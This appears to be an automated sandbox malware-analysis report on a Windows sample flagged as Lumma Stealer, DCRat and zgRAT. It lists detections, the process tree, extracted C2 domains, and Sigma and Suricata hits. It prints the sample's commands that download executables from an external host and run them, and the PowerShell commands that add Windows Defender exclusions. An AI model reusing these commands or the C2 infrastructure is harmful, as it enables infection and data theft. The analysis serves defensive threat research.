Edit tour

Windows Analysis Report
seoI30IZZr.exe

Overview

General Information

Sample name:	seoI30IZZr.exe renamed because original name is a hash value
Original sample name:	26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34.exe
Analysis ID:	1522824
MD5:	d0e53e2a0bef6c93e0ccad47a650079d
SHA1:	8e69fc482c058749cc7974e94ad7d571fca6ccf2
SHA256:	26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34
Tags:	exezelensky-topuser-JAMESWT_MHT
Infos:

Detection

LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to inject code into remote processes

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Suspicious execution chain found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to resolve many domain names, but no domain seems valid

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Electron Application Child Processes

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

seoI30IZZr.exe (PID: 4780 cmdline: "C:\Users\user\Desktop\seoI30IZZr.exe" MD5: D0E53E2A0BEF6C93E0CCAD47A650079D)

conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3456 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 3832 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

kdmapper.exe (PID: 2616 cmdline: "C:\Windows\Speech\kdmapper.exe" MD5: C85ABE0E8C3C4D4C5044AEF6422B8218)

wscript.exe (PID: 5480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 6496 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msedge.exe (PID: 4900 cmdline: "C:\Edge/msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

csc.exe (PID: 4200 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

csc.exe (PID: 5072 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

powershell.exe (PID: 3848 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2736 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 6864 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7160 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5992 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3148 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 5656 cmdline: "C:\Users\user\AppData\Local\WmiPrvSE.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4200 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

curl.exe (PID: 4424 cmdline: curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 1288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC0.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

physmeme.exe (PID: 5064 cmdline: "C:\Windows\Speech\physmeme.exe" MD5: D6EDF37D68DA356237AE14270B3C7A1A)

conhost.exe (PID: 708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 5072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 5992 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9270.tmp" "c:\Windows\System32\CSC90DD46E6AB146EBB2673718B916635.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

RegAsm.exe (PID: 3724 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

msedge.exe (PID: 1856 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 7140 cmdline: C:\Edge\msedge.exe MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 6732 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xPfNd2AH1w.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4024 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 3484 cmdline: "C:\Users\user\AppData\Local\WmiPrvSE.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

msedge.exe (PID: 1836 cmdline: "C:\Edge\msedge.exe" MD5: ABD343DF6FBD7334D617F76F6F050E3C)

cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5308 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7060 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

cmd.exe (PID: 6264 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Jcydu7dUmM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6280 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: LummaC

{"C2 url": ["coursedonnyre.shop", "appleboltelwk.shop", "tiddymarktwo.shop", "surveriysiop.shop", "strappystyio.shop", "captainynfanw.shop", "tearrybyiwo.shop", "tendencerangej.shop", "fossillargeiw.shop"], "Build id": "1AsNN2--5899070203"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Edge\msedge.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Edge\msedge.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\Speech\kdmapper.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: msedge.exe PID: 4900	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 5656	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
5.3.kdmapper.exe.530c6cf.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.530c6cf.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.69bb6cf.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.69bb6cf.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.0.msedge.exe.120000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
16.0.msedge.exe.120000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.530c6cf.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.530c6cf.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
5.3.kdmapper.exe.69bb6cf.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.3.kdmapper.exe.69bb6cf.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\WmiPrvSE.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\WmiPrvSE.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", ProcessId: 4200, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Electron Application Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\seoI30IZZr.exe", ParentImage: C:\Users\user\Desktop\seoI30IZZr.exe, ParentProcessId: 4780, ParentProcessName: seoI30IZZr.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe, ProcessId: 3456, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 2616, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 5480, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 4900, TargetFilename: C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\WmiPrvSE.exe', ProcessId: 3848, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Edge/msedge.exe", ParentImage: C:\Edge\msedge.exe, ParentProcessId: 4900, ParentProcessName: msedge.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline", ProcessId: 4200, ProcessName: csc.exe

Suricata Signatures

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.819790+0200	2056036	1	Domain Observed Used for C2 Detected	192.168.2.8	50741	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.793557+0200	2056040	1	Domain Observed Used for C2 Detected	192.168.2.8	55461	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.858485+0200	2056042	1	Domain Observed Used for C2 Detected	192.168.2.8	50670	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.845073+0200	2056046	1	Domain Observed Used for C2 Detected	192.168.2.8	55758	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.869633+0200	2056052	1	Domain Observed Used for C2 Detected	192.168.2.8	59161	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.780192+0200	2056054	1	Domain Observed Used for C2 Detected	192.168.2.8	58540	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.808005+0200	2056056	1	Domain Observed Used for C2 Detected	192.168.2.8	53563	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.832660+0200	2056058	1	Domain Observed Used for C2 Detected	192.168.2.8	61329	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-30T18:19:16.762080+0200	2056172	1	Domain Observed Used for C2 Detected	192.168.2.8	55029	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: seoI30IZZr.exe

Avira: detected

Antivirus detection for URL or domain

